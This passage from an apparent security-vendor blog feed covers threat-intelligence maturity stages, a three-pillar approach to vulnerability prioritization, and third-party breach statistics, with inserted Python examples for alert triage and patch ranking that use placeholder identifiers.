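

def consolidate(records):
    """Merge feed records into one view keyed by indicator value.

    Duplicates keep the highest confidence and the union of sources, so the
    same IP reported by two feeds produces one enrichment, not two alerts.
    """
    merged = {}
    for rec in records:
        cur = merged.setdefault(rec["value"], {"confidence": 0, "campaign": None, "sources": set()})
        cur["confidence"] = max(cur["confidence"], rec["confidence"])
        cur["campaign"] = cur["campaign"] or rec["campaign"]
        cur["sources"].add(rec["source"])
    return merged


def is_internal(value):
    """True for RFC 1918 addresses; hostnames are always lookup candidates."""
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def parse_alert(line):
    """Return the alert's fields as a dict, with the timestamp under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(KV_RE.findall(rest))
    fields["ts"] = ts
    return fields


def candidate_indicators(fields):
    """Yield the values worth looking up: external IPs and queried hostnames."""
    for key in ("src", "dst", "qname"):
        value = fields.get(key)
        if value and not is_internal(value):
            yield value


def triage(alert_lines, indicators):
    """Enrich each alert and assign an action; collapse exact repeats.

    Actions: 'escalate' (high-confidence match), 'review' (low-confidence
    match), 'queue' (no intelligence match). Repeats of the same
    (host, indicator, alert type) within the batch are counted, not re-opened.
    """
    seen, rows = {}, []
    for line in alert_lines:
        fields = parse_alert(line)
        match = next(((ioc, indicators[ioc]) for ioc in candidate_indicators(fields) if ioc in indicators), None)
        key = (fields.get("host"), match[0] if match else None, fields.get("alert"))
        if key in seen:
            seen[key]["count"] += 1
            continue
        if match is None:
            action = "queue"
        elif match[1]["confidence"] >= ESCALATE_AT:
            action = "escalate"
        else:
            action = "review"
        row = {
            "ts": fields["ts"], "host": fields.get("host"), "alert": fields.get("alert"),
            "indicator": match[0] if match else None,
            "confidence": match[1]["confidence"] if match else None,
            "campaign": match[1]["campaign"] if match else None,
            "sources": sorted(match[1]["sources"]) if match else [],
            "action": action, "count": 1,
        }
        seen[key] = row
        rows.append(row)
    return rows


if __name__ == "__main__":
    for r in triage(ALERTS, consolidate(FEED_RECORDS)):
        print(f"{r['action']:8} x{r['count']} {r['host']:8} {r['alert']:14} {r['indicator'] or '-'} {r['campaign'] or ''}")
```

        <p>Two design points carry over to a real deployment: the consolidation step is what makes the "known bad" duplicate count fall, because one indicator seen by three feeds becomes one enrichment, and the internal-address filter keeps the lookup from spending feed queries on private addresses that no external feed will ever match.</p>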
        <p><strong>Success Indicators and KPIs</strong></p>
        <p>Across the industry, certain standards, KPIs and other measures have emerged to help orient and assess one’s progress through each stage of the maturity journey. For the Reactive stage, these include:</p>
        <ul>
          <li>Reduction in duplicate or “known bad” alerts.</li>
          <li>Decrease in manual investigations per analyst.</li>
          <li>Improved Mean Time to Triage (MTTT): faster analysis of known threats.</li>
          <li>Greater integration between intelligence feeds and alert management.</li>
        </ul>
        <p>The Reactive stage is about laying the groundwork for operationalized intelligence, consolidating data and reducing noise so analysts can focus on meaningful threats. Once teams can respond consistently and efficiently, they’re ready to evolve toward a proactive posture.</p>
        <h3>Stage 2: Proactive—Preventing Known Threats</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fc1b038d0f8112a450d00812f76e30ff86907e12.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
        <p>The Proactive stage marks a crucial transition from reacting to known events to actively preventing them. Here, organizations begin to enrich alerts with context, prioritize risk, and use intelligence to inform vulnerability management and threat hunting.</p>
        <p>Teams at this stage have moved beyond basic detection. They use intelligence to drive decision-making, asking “What matters most to us?” instead of simply responding to what the feeds say.</p>
        <p><strong>Characteristics of a Proactive Organization</strong></p>
        <ul>
          <li>Security teams conduct regular threat hunting exercises to identify indicators of compromise before alerts fire.</li>
          <li>Vulnerability management programs are intelligence-led, prioritizing patches based on real-world exploitation trends.</li>
          <li>Analysts can articulate threat actor behaviors and motivations, not just indicators.</li>
          <li>Intelligence is beginning to inform executive-level reporting and risk assessments.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Context overload: Adding intelligence without prioritization can still create noise.</li>
          <li>Scaling analysis: Manual research can’t keep up with threat volume.</li>
          <li>Communication gaps: Intelligence insights may not reach decision-makers fast enough.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Integrate enrichment and context directly into alert workflows.</li>
          <li>Use intelligence to prioritize vulnerabilities being actively exploited in the wild.</li>
          <li>Establish a repeatable threat hunting process tied to known tactics, techniques and procedures (TTPs).</li>
          <li>Create basic reporting dashboards to show intelligence-driven outcomes to leadership.</li>
        </ul>
        <p><strong>Success Indicators and KPIs</strong></p>
        <p>As outlined above, industry best practices and our own internal expertise have helped to inform clear indicators of success and measurable KPIs to help you traverse this stage:</p>
        <ul>
          <li>Reduction in Mean Time to Respond (MTTR), building on the faster triage achieved in the Reactive stage, and faster full-cycle incident resolution.</li>
          <li>Increase in incidents identified through proactive hunting.</li>
          <li>Decrease in unpatched, high-risk vulnerabilities.</li>
          <li>More consistent cross-departmental sharing of intelligence insights.</li>
        </ul>
        <p>Proactive organizations are no longer purely reactive responders; they are early detectors. They use operational cyber threat intelligence to stop known attacks before they strike, bridging the gap between detection and prevention.</p>
        <h3>Stage 3: Predictive—Anticipating What’s Next</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_182c7617c0aa63432375b741a10c23a269f507446.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
        <p>At the Predictive stage, organizations transform from defenders into forecasters. Intelligence isn’t just about identifying active threats. It’s about anticipating what adversaries will do next.</p>
        <p>Predictive intelligence uses advanced analytics, automation, and pattern recognition to reveal emerging campaigns, shifting tactics, and vulnerabilities before they’re exploited. At this stage, intelligence becomes strategic, influencing not just SOC operations but enterprise-wide risk management and planning.</p>
        <p><strong>Characteristics of a Predictive Organization</strong></p>
        <ul>
          <li>Security and risk teams share a unified intelligence strategy.</li>
          <li>Machine learning and AI tools help identify evolving threat trends.</li>
          <li>Insights extend beyond cyber to supply chain, digital risk, and geopolitical factors.</li>
          <li>The organization uses predictive intelligence to guide security investment decisions.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Data interpretation: Turning predictive signals into actionable decisions.</li>
          <li>Cross-functional alignment: Intelligence must inform departments beyond security (legal, procurement, communications).</li>
          <li>Maintaining analyst trust in automation, ensuring predictive systems remain transparent and explainable.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Combine internal telemetry with external intelligence for a 360° threat view.</li>
          <li>Monitor emerging TTPs and map them to organizational exposures.</li>
          <li>Develop scenario-based playbooks informed by predictive analysis.</li>
          <li>Use predictive insights to shape security budgets and executive strategy.</li>
        </ul>
        <p><strong>Success Indicators and KPIs</strong></p>
        <ul>
          <li>Significant reduction in average dwell time (threats neutralized before causing damage).</li>
          <li>Overall percentage of threats mitigated before exploitation.</li>
          <li>Increased accuracy of threat forecasting.</li>
          <li>Improved strategic alignment between security and business objectives.</li>
        </ul>
        <p>The Predictive stage represents the maturation of threat intelligence operations. Security becomes a forward-looking function—one that can anticipate risk and shape outcomes, rather than merely react and respond to them.</p>
        <h3>Stage 4: Autonomous—Intelligence at Machine Speed</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c74008a813f7e84c128161a489a5f6ffbf9b477f.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
        <p>The Autonomous stage represents the pinnacle of operational cyber threat intelligence maturity. At this point, intelligence systems and <a href="https://www.recordedfuture.com/blog/how-the-right-ai-enables-an-autonomous-future">AI-driven automation</a> operate continuously: detecting, analyzing, and responding to threats with minimal human intervention.</p>
        <p>Here, human analysts focus on strategic research, oversight, and long-term planning while machines handle routine detection and response. Intelligence is fully operationalized, driving every aspect of the security ecosystem in real time.</p>
        <p><strong>Characteristics of an Autonomous Organization</strong></p>
        <ul>
          <li>Threat intelligence is deeply integrated across all systems and workflows.</li>
          <li>AI and automation enable continuous detection and response without manual triggers.</li>
          <li>The organization has global visibility into digital, third-party, and geopolitical risks.</li>
          <li>Threat intelligence is recognized as a strategic business differentiator.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Governance and oversight: Ensuring automated decisions remain transparent and aligned with policy.</li>
          <li>Cultural adaptation: Building trust in autonomous operations among leadership and analysts.</li>
          <li>Optimization: Continuously tuning models and workflows for performance and precision.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Expand autonomous intelligence integration across the full security stack.</li>
          <li>Enable continuous enrichment of intelligence data for context-aware decision-making.</li>
          <li>Automate rule creation and response playbooks based on live threat insights.</li>
          <li>Use AI to generate executive-level summaries and automated intelligence reporting.</li>
        </ul>
        <p><strong>Success Indicators and KPIs</strong></p>
        <ul>
          <li>High rate of automated response actions.</li>
          <li>Continuous reduction in dwell time.</li>
          <li>Consistent threat mitigation without human escalation.</li>
          <li>Cross-functional visibility and reporting of intelligence outcomes.</li>
        </ul>
        <p>In the Autonomous stage, the line between intelligence and action disappears. Security operations are intelligence-led and self-improving, creating a closed-loop system that operates at the same speed as the adversaries it defends against.</p>
        <h2>Fueling the Engine: How Intelligence Powers Every Stage</h2>
        <p>Progression through these maturity stages depends on the quality, breadth, and automation of the <a href="https://www.recordedfuture.com/threat-intelligence-101/tools-and-technologies">underlying intelligence platform</a>. Recorded Future’s ecosystem exemplifies this principle—providing comprehensive data, contextual insights, and machine-speed automation to advance organizations along the maturity curve.</p>
        <table>
          <thead>
            <tr>
              <th>Stage</th>
              <th>Primary Intelligence Focus</th>
              <th>Outcome</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>Reactive</td>
              <td>High-confidence indicator feeds (IPs, domains, hashes).</td>
              <td>Faster triage and response to known threats.</td>
            </tr>
            <tr>
              <td>Proactive</td>
              <td>Context-rich intelligence: vulnerability data, actor profiles, and exploit trends.</td>
              <td>Prioritized patching and early threat detection.</td>
            </tr>
            <tr>
              <td>Predictive</td>
              <td>Strategic insights: TTPs, campaign monitoring, and predictive modeling.</td>
              <td>Anticipation of future threats and informed investments.</td>
            </tr>
            <tr>
              <td>Autonomous</td>
              <td>Always-on AI-driven analysis and automation.</td>
              <td>Continuous detection, response, and operational resilience.</td>
            </tr>
          </tbody>
        </table>
        <p>At every stage, operational cyber threat intelligence is both the fuel and the framework for progress. It informs decisions, shapes response playbooks, and empowers organizations to act faster, smarter, and with greater confidence.</p>
        <h2>Your Next Move on the Journey to Operational Intelligence Maturity</h2>
        <p>Operationalizing threat intelligence is not a single milestone; it’s a journey. Each stage builds upon the last, requiring time, structure, and deliberate investment in people, process, and intelligence integration. Just like a human learning to crawl, walk, run, and sprint, the journey towards maturity is rich with both challenges and rewards.</p>
        <p>The key is honest assessment:</p>
        <ul>
          <li>Are you still chasing alerts in a reactive, ad hoc fashion?</li>
          <li>Have you begun to prevent known threats through proactive hunting and prioritization?</li>
          <li>Are you using predictive analytics to anticipate emerging risks?</li>
          <li>Or have you reached autonomous operations, where intelligence drives decisions at machine speed?</li>
        </ul>
        <p>Wherever you are today, your next move determines how effectively your organization can predict, prevent, and protect against tomorrow’s threats.</p>
        <p>Whether you’re integrating your first intelligence feed or orchestrating fully <a href="https://www.recordedfuture.com/products/autonomous-threat-operations">autonomous threat response</a>, Recorded Future provides the data, context, and automation to accelerate your journey toward operational cyber threat intelligence maturity.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_190a9f903d9fbd7b56c2e00fd894596d5b7793258.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Addressing the vulnerability prioritization challenge]]></title>
            <link>https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge</guid>
            <pubDate>Tue, 18 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Struggling with vulnerability overload? Learn why CVSS scores alone aren't enough—and how a three-pillar framework using real-world threat intel, environmental context, and organizational realities can help you prioritize what truly matters.]]></description>
            <content:encoded><![CDATA[
        <p>How do you prioritize what vulnerabilities to patch when you have thousands of alerts and critical remote code execution flaws buried next to low-priority information disclosures?</p>
        <p><a href="https://www.recordedfuture.com/blog/when-vulnerability-information-flows-are-vulnerable-themselves">MITRE's CVE List</a> grows by dozens or even hundreds of entries daily. Your team can’t patch everything.</p>
        <p>With some organizations facing tens of thousands of vulnerability alerts each month, it’s clear that detection isn't the problem anymore. The challenge that keeps vulnerability management teams up at night is prioritization. With limited resources and maintenance windows, you can't patch everything immediately. You need to know what matters most.</p>
        <p>Relying on universal CVSS scores that aren't specific to your organization <a href="https://www.recordedfuture.com/blog/risk-based-vulnerability-cvss-doesnt">won't solve this prioritization challenge</a>. A vulnerability might score 9.8 on the CVSS scale, suggesting catastrophic risk, yet never be exploited in the wild. Meanwhile, a 7.5-rated vulnerability could be actively fueling ransomware campaigns targeting your industry right now.</p>
        <h2>Why CVSS alone falls short</h2>
        <p>CVSS serves a purpose. It provides a standardized way to measure the theoretical severity of vulnerabilities based on their technical characteristics. It tells you how bad things could get if someone exploits a vulnerability under ideal conditions. That's valuable information, but it's only part of the story.</p>
        <p>CVSS can't tell you whether cybercriminals are actively exploiting a vulnerability. It doesn't know if ransomware groups have weaponized it or if working exploit code is circulating in the wild. It can't assess whether a vulnerability affects your critical payment processing systems or an isolated test server. And it certainly can't determine whether you can actually deploy a patch without breaking essential business operations.</p>
        <p>This gap between theoretical risk and practical reality creates a dangerous blind spot. Teams end up in one of two traps: either they try to patch everything rated "critical" or "high," burning out their staff and disrupting operations, or they become numb to the constant stream of high scores and miss the vulnerabilities that truly matter.</p>
        <p>The solution isn't to abandon CVSS. The solution is to enhance it with real-world context. You need a framework that answers the questions CVSS can't address. That's where the three-pillar approach transforms vulnerability management from overwhelming to actionable.</p>
        <h2>The three-pillar framework: your guide to modern prioritization</h2>
        <p>The three-pillar framework provides a systematic approach to cut through the noise, identify what truly requires immediate action, and clearly communicate the evidence to defend those decisions to patching teams and leadership.</p>
        <p>Each pillar answers a fundamental question that transforms raw vulnerability data into actionable intelligence. Together, they help give you the context needed to confidently prioritize your patching efforts and communicate those priorities to stakeholders who need to understand why certain vulnerabilities jump to the front of the queue.</p>
        <h3>Intelligence pillar: how likely is exploitation?</h3>
        <p>The first pillar shifts your focus from theoretical to actual risk. While CVSS measures how severe a vulnerability could be in theory, the intelligence pillar asks the questions that matter in practice for your organization:</p>
        <ul>
          <li>Is anyone actually exploiting this vulnerability?</li>
          <li>Are ransomware groups using it in active campaigns?</li>
          <li>Does proof-of-concept (PoC) code exist in the wild?</li>
          <li>Is exploitation trending upward or remaining dormant?</li>
        </ul>
        <p>Consider this scenario: your scanner flags two vulnerabilities.</p>
        <ul>
          <li>The first has a CVSS score of 10, but it’s never been observed in real-world attacks.</li>
          <li>The second has a CVSS of 7.5 but appears in ongoing ransomware campaigns targeting organizations in your industry.</li>
        </ul>
        <p>Which deserves your immediate attention? The Intelligence pillar makes the answer clear: the second vulnerability, despite its lower score, is the one adversaries are actually using against organizations like yours, and it should take priority.</p>
        <p>The Intelligence pillar transforms abstract severity scores into actionable threat intelligence by revealing which vulnerabilities are actually being exploited in the wild. Without this layer, you're patching blind, potentially spending weeks addressing theoretical risks while missing the vulnerabilities criminals are actively using.</p>
        <h3>Environmental pillar: what’s your specific risk?</h3>
        <p>A vulnerability doesn't exist in isolation. Where it lives in your environment determines its actual risk to your organization. The Environmental pillar forces you to map generic vulnerability data to your specific infrastructure and business context.</p>
        <p>The same vulnerability presents vastly different risk profiles depending on its location:</p>
        <ul>
          <li>Is it on an internet-facing payment server or an air-gapped development system?</li>
          <li>Does it affect one legacy application or your entire server fleet?</li>
          <li>Are the vulnerable systems processing customer data or internal test data?</li>
          <li>Do these systems connect to critical business partners or operate in isolation?</li>
        </ul>
        <p>Scale matters too. A CVSS 9.0 vulnerability affecting one isolated system generally poses less organizational risk than the same vulnerability present across hundreds of production servers. When two vulnerabilities have equal severity and exploitation likelihood, the one touching more assets typically deserves priority. More exposure points mean more opportunities for compromise and greater remediation complexity.</p>
        <p>A CVSS base score treats every instance of a vulnerability as equal; the standard's Environmental metric group can adjust for deployment context, but most scanners and feeds report only the base score. Modern vulnerability management teams have learned that environmental context changes the picture entirely. A SQL injection vulnerability on your public e-commerce platform demands different treatment than the same flaw on an internal reporting tool. The environmental pillar captures these crucial distinctions.</p>
        <p>By mapping vulnerabilities to your actual infrastructure, you move from broad categorizations to precise, business-aligned priorities. This isn't about making excuses for delayed patching. It's about ensuring your limited resources protect what matters most to your organization.</p>
        <h3>Organizational pillar: can you actually fix it?</h3>
        <p>Even the most critical vulnerability becomes meaningless if you can't address it. The Organizational pillar acknowledges a reality that pure risk scoring ignores: your ability to actually implement fixes varies dramatically across your infrastructure.</p>
        <p>This pillar addresses practical constraints:</p>
        <ul>
          <li>Does a patch exist from the vendor?</li>
          <li>Will deploying it break critical business operations?</li>
          <li>Do you have administrative access to the affected systems?</li>
          <li>Can you meet change control requirements for production systems?</li>
          <li>Are there compensating controls that reduce risk without patching?</li>
        </ul>
        <p>Resource limitations shape what's possible:</p>
        <ul>
          <li>Your single vulnerability management engineer can't tackle the same volume as a dedicated team of ten.</li>
          <li>Budget constraints might prevent upgrading legacy systems.</li>
          <li>Maintenance windows might only occur quarterly for critical infrastructure.</li>
        </ul>
        <p>For better or worse, these realities determine which vulnerabilities you can meaningfully address.</p>
        <p>The organizational pillar transforms these constraints into strategic advantages by focusing efforts where you can achieve real risk reduction rather than pretending every vulnerability is equally fixable. This can mean prioritizing ten medium-severity vulnerabilities you can patch this weekend over a critical vulnerability requiring a six-month system overhaul, while also revealing opportunities for alternative risk reduction. By acknowledging what you can't change, you identify creative solutions for what you can control.</p>
        <p>This doesn’t mean you should disregard vulnerabilities you cannot immediately patch. Adding these to a watch list ensures you're alerted when their risk profile changes; when proof-of-concept code appears, exploitation becomes likely, or active attacks begin. This heightened awareness lets you adjust compensating controls or expedite remediation efforts as the threat landscape evolves.</p>
        <p>Most importantly, this pillar provides the business context that resonates with leadership. When you explain that fixing vulnerability X requires shutting down manufacturing for a week while vulnerability Y can be addressed during normal maintenance, priorities become clear. You're not making excuses. You're making informed business decisions about risk.</p>
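        <p>The three pillars carried through as one scoring pass, as an added example (not code from Recorded Future or from this post; it also covers the Proactive stage's step of prioritizing actively exploited vulnerabilities from the maturity model above). The weights, thresholds and the four findings below are constructed for illustration, with placeholder identifiers rather than real CVEs; tune them to your own risk appetite. The point is the shape of the decision: a CVSS 10 that nobody is exploiting drops behind a CVSS 7.5 in active ransomware use, an exploited flaw on one air-gapped box sinks on environmental context, and a finding with no patch lands on a watch list that re-scores it the moment its intelligence changes.</p>

```python
"""Three-pillar prioritization: intelligence, environmental and organizational
context layered over a CVSS base score.

Added example, not code from Recorded Future or this post. Weights, thresholds
and findings are constructed; VULN-* are placeholders, not real CVE IDs.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Finding:
    vuln_id: str              # placeholder identifier, not a real CVE
    cvss: float               # base score, 0-10: theoretical severity only
    # Intelligence pillar: how likely is exploitation?
    exploited_in_wild: bool
    poc_public: bool
    ransomware_use: bool
    targets_our_sector: bool
    # Environmental pillar: what is our specific exposure?
    internet_facing: bool
    sensitive_data: bool
    asset_count: int
    # Organizational pillar: can we actually fix it?
    patch_available: bool
    compensating_control: bool


def likelihood(f):
    """Intelligence pillar -> 0..1. Observed exploitation outranks a public PoC,
    which outranks a theoretical flaw; adversary focus on our sector adds weight."""
    score = 0.1
    if f.poc_public:
        score = 0.4
    if f.exploited_in_wild:
        score = 0.85 if f.ransomware_use else 0.7
    if f.targets_our_sector:
        score += 0.15
    return min(score, 1.0)


def exposure(f):
    """Environmental pillar -> 0..1. Reach (internet-facing), data sensitivity
    and scale (how many assets carry the flaw) multiply together."""
    reach = 1.0 if f.internet_facing else 0.4
    sensitivity = 1.0 if f.sensitive_data else 0.6
    scale = min(1.0, 0.2 + f.asset_count / 100)
    return reach * sensitivity * scale


def priority(f):
    """Combined 0..1 score: severity times likelihood times exposure."""
    return round(f.cvss / 10 * likelihood(f) * exposure(f), 3)


def action(f):
    """Organizational pillar decides the action, not just the score: with no
    patch, the finding is mitigated (if a control exists) and watched."""
    if not f.patch_available:
        return "mitigate and watch" if f.compensating_control else "watch list"
    p = priority(f)
    if p >= 0.4:
        return "emergency patch"
    if p >= 0.15:
        return "next maintenance window"
    return "routine cycle"


def rank(findings):
    """Findings ordered for the patching queue, highest priority first."""
    return sorted(findings, key=priority, reverse=True)


def reassess(f, **changes):
    """Re-score a finding when its intelligence or constraints change, e.g. a
    watch-listed item whose PoC goes public or whose vendor ships a patch."""
    return replace(f, **changes)


# Constructed findings mirroring the post's scenarios. Field order:
# id, cvss, exploited, poc, ransomware, sector, internet, sensitive, assets, patch, control
FINDINGS = [
    Finding("VULN-A", 10.0, False, False, False, False, True, True, 30, True, False),  # CVSS 10, never exploited
    Finding("VULN-B", 7.5, True, True, True, True, True, True, 40, True, False),       # CVSS 7.5, ransomware, our sector
    Finding("VULN-C", 9.8, True, True, False, False, False, False, 3, False, True),    # exploited, no vendor patch yet
    Finding("VULN-D", 9.0, True, True, False, False, False, False, 1, True, False),    # exploited, one isolated dev box
]

if __name__ == "__main__":
    for f in rank(FINDINGS):
        print(f"{f.vuln_id} cvss={f.cvss:4} priority={priority(f):.3f} -> {action(f)}")
    # Watch-list trigger: VULN-A's intelligence changes, so its action changes.
    hot = reassess(FINDINGS[0], exploited_in_wild=True, ransomware_use=True, targets_our_sector=True)
    print(f"{hot.vuln_id} after exploitation observed: {action(hot)}")
```

        <p>The organizational pillar is deliberately applied after scoring rather than folded into the score: a finding you cannot patch should not disappear from view because its number is low, it should sit on the watch list with its compensating control recorded, and the same function re-scores it when a vendor fix or new exploitation evidence arrives.</p>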
        <h2>Transforming communication and action</h2>
        <p>Armed with insights from all three pillars, you transform how you communicate about vulnerabilities both within your security team and to leadership. This targeted, evidence-based approach cuts through patch fatigue and clearly articulates why specific vulnerabilities demand immediate attention.</p>
        <p>Stop saying: "We have 1,000 critical vulnerabilities to patch this month."</p>
        <p>Start saying: "We've identified 10 vulnerabilities being actively exploited by three ransomware groups that specifically target financial services organizations. Eight affect our payment processing systems, and we can patch them this weekend. Two require vendor fixes we're tracking closely, but we've implemented network segmentation to reduce exposure."</p>
        <p>This specificity matters. When you can show leadership that APT groups with proven intent to target your industry are actively exploiting certain vulnerabilities, priorities become crystal clear. You're not just citing CVSS scores; you're demonstrating real threats from real adversaries using real attack methods.</p>
        <p>This communication shift works at every level:</p>
        <table>
          <tbody>
            <tr>
              <td>For Executives:</td>
              <td>Focus on business impact and risk reduction, not technical scores.</td>
            </tr>
            <tr>
              <td>For IT Operations:</td>
              <td>Provide clear justification for emergency patches versus planned updates.</td>
            </tr>
            <tr>
              <td>For Development Teams:</td>
              <td>Explain why certain fixes need priority in the next sprint.</td>
            </tr>
            <tr>
              <td>For Auditors:</td>
              <td>Demonstrate a mature, risk-based approach to vulnerability management.</td>
            </tr>
          </tbody>
        </table>
        <p>When you ground your recommendations in real-world exploitation data, business context, and practical constraints, you build credibility. Teams stop seeing vulnerability management as crying wolf about every high CVSS score. Instead, they recognize you as a strategic partner who understands both security risks and business realities.</p>
        <h2>Making the three pillars work: the role of intelligence</h2>
        <p>The three-pillar framework transforms vulnerability prioritization, but requires <a href="https://www.recordedfuture.com/platform/intelligence-graph">comprehensive, real-time threat intelligence</a> to avoid guesswork. Manually researching thousands of vulnerabilities for exploitation evidence, mapping them to your environment, and tracking patches isn't sustainable. Teams need continuously updated, contextually relevant intelligence that's immediately actionable through automation to leverage this framework.</p>
        <p>Recorded Future's <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> Module delivers real-time exploitation data from across the web, tracking vulnerabilities from proof-of-concept to active threat actor use.<br />Dynamic risk scoring automatically factors in your environmental context and organizational constraints. Lifecycle monitoring alerts you the moment patches become available or exploitation begins. <a href="https://www.recordedfuture.com/blog/use-a-threat-map-to-visualize-your-cyber-threats">Threat Maps</a> visualize which actors target your industry and the CVEs they’re exploiting to do so, helping you correlate your vulnerabilities with attackers' specific TTPs.</p>
        <p>Organizations using Vulnerability Intelligence report saving 15.9 hours per week on investigation and achieving an 86% reduction in unplanned downtime. Instead of drowning in CVSS scores, these teams know exactly <a href="https://www.recordedfuture.com/use-case/exposure-management">which exposures demand immediate attention</a> and can articulate why. They patch what matters before it impacts their business.</p>
        <p>Ready to see the three-pillar framework in action? <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/4efc8e29-c286-40af-91aa-7cb3eee300a5">Watch our workshop webinar</a> where security experts demonstrate how Vulnerability Intelligence transforms overwhelming vulnerability data into clear, defensible priorities that protect what matters most. If you are a current user interested in learning more about how your team can <a href="https://www.recordedfuture.com/services#:~:text=Our%20onboarding%20service%20ensures%20your,Recorded%20Future%20University%20offers:">more effectively prioritize Alerts with Vulnerability Intelligence</a>, reach out to your Customer Success Manager to schedule a consultation.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_182edadffd3e984b13663e305ab0f61d712b8c845.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Third-Party Risk Statistics]]></title>
            <link>https://www.recordedfuture.com/blog/third-party-risk-statistics</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/third-party-risk-statistics</guid>
            <pubDate>Thu, 13 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore the latest third-party risk statistics and learn how data-driven, continuous monitoring for third-party risk assessments can protect your supply chain.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Third-party risk is escalating. In 2024, <a href="https://www.verizon.com/business/resources/reports/dbir/?cmp=2025:05:ge:us::ns:pre:pse:goo::ao:8888855284:_ds_cid_12663792230_ds_agid_120689634176&amp;utm_term=2025%20verizon%20dbir&amp;utm_medium=cpc&amp;utm_source=google&amp;utm_campaign=GGL_BND_Security_Exact&amp;utm_content=Enterprise&amp;gclsrc=aw.ds&amp;gad_source=1&amp;gad_campaignid=12663792230&amp;gbraid=0AAAAABymyRHhg5JOGBOV1X5-Dv-fQUW-x&amp;gclid=Cj0KCQjwmYzIBhC6ARIsAHA3IkS_jbkuugdrvUCFFSOo4FNdNiUK-HNDd_DT2ciS_EklV92OV67KJU4aAt7MEALw_wcB">30% of breaches</a> involved a third-party vendor, twice the share seen the previous year.</li>
          <li>Static assessments are no longer enough. Questionnaire-based audits provide only outdated snapshots, leaving organizations blind to evolving threats between review cycles.</li>
          <li>Continuous, intelligence-led monitoring is essential. Real-time visibility into vendors’ external security posture enables faster detection, objective risk scoring, and proactive defense.</li>
          <li>Recorded Future’s Third-Party Intelligence closes the gap. By continuously tracking over 5 million organizations and 1 million technology products, it gives security teams the data-driven insight needed to stay ahead of emerging supply chain threats.</li>
        </ul>
        <h2>The Modern Supply Chain: A Widening Attack Surface</h2>
        <p>The digital supply chain has undergone a profound transformation. What was once a small network of trusted vendors has evolved into a vast, interconnected web of technologies, platforms, and data flows.</p>
        <p>Cloud providers now host mission-critical infrastructure. SaaS platforms handle sensitive data. Managed service providers, subcontractors, and open-source libraries form the unseen backbone of daily operations. Each of these relationships expands the attack surface, introducing new dependencies and new vulnerabilities.</p>
        <p>A single vendor today may rely on dozens of others, each with its own third- and fourth-party relationships. The result is an ecosystem of thousands of potential ingress points, with many of them outside an organization’s direct line of sight. These dependencies are often invisible beyond the first tier, leaving businesses exposed to risks they may not even know exist.</p>
        <p>Cybercriminals understand this. Supply chain compromises have become a preferred strategy for attackers because infiltrating a vendor is often easier and more scalable than targeting an organization directly. By compromising one trusted connection, adversaries can pivot to dozens of downstream victims, often before the original breach is even detected.</p>
        <p>This expanding ecosystem demands a new approach. Securing the modern digital supply chain requires continuous, intelligence-led visibility, one that provides an external, real-time view of every partner and vendor’s security posture. Only with ongoing, data-driven insight can organizations uncover hidden exposures and detect emerging threats before small weaknesses become systemic failures.</p>
        <h2>The Unavoidable Truth: Key Third-Party Risk Statistics for 2025</h2>
        <p>Every year, the volume, cost, and complexity of vendor-related breaches continue to rise, exposing weaknesses that traditional risk management can’t contain. The following third-party risk statistics illustrate just how pervasive the problem has become and why a new approach is urgently needed.</p>
        <h3>Frequency and Volume</h3>
        <p>Third-party breaches are no longer isolated events. They are becoming a defining feature of the modern threat landscape.</p>
        <p>According to Verizon’s most recent Data Breach Investigations Report, 30% of breaches involved a third-party vendor, double the previous year’s share. That figure is likely conservative: third-party involvement is underreported and frequently misclassified, especially when the compromise occurs several layers deep in an organization’s vendor ecosystem.</p>
        <h3>Financial Impact</h3>
        <p>According to <a href="https://www.ibm.com/account/reg/us-en/signup?formid=urx-53830">IBM’s 2024 Cost of a Data Breach</a> report, the average cost of a third-party breach exceeds $5 million ($5.08 million). Highly regulated sectors such as healthcare and finance face even steeper costs.</p>
        <p>The true financial impact of a breach extends beyond the initial response, encompassing lost revenue, increased cyber insurance premiums, and reputational damage that drives customer churn. Organizations may also face expensive marketing and PR efforts to restore trust after a high-profile supply chain incident.</p>
        <p>Dwell time — the duration between initial compromise and detection — compounds these costs. In 2024, organizations with a dwell time beyond 200 days faced average breach costs of $5.01 million.</p>
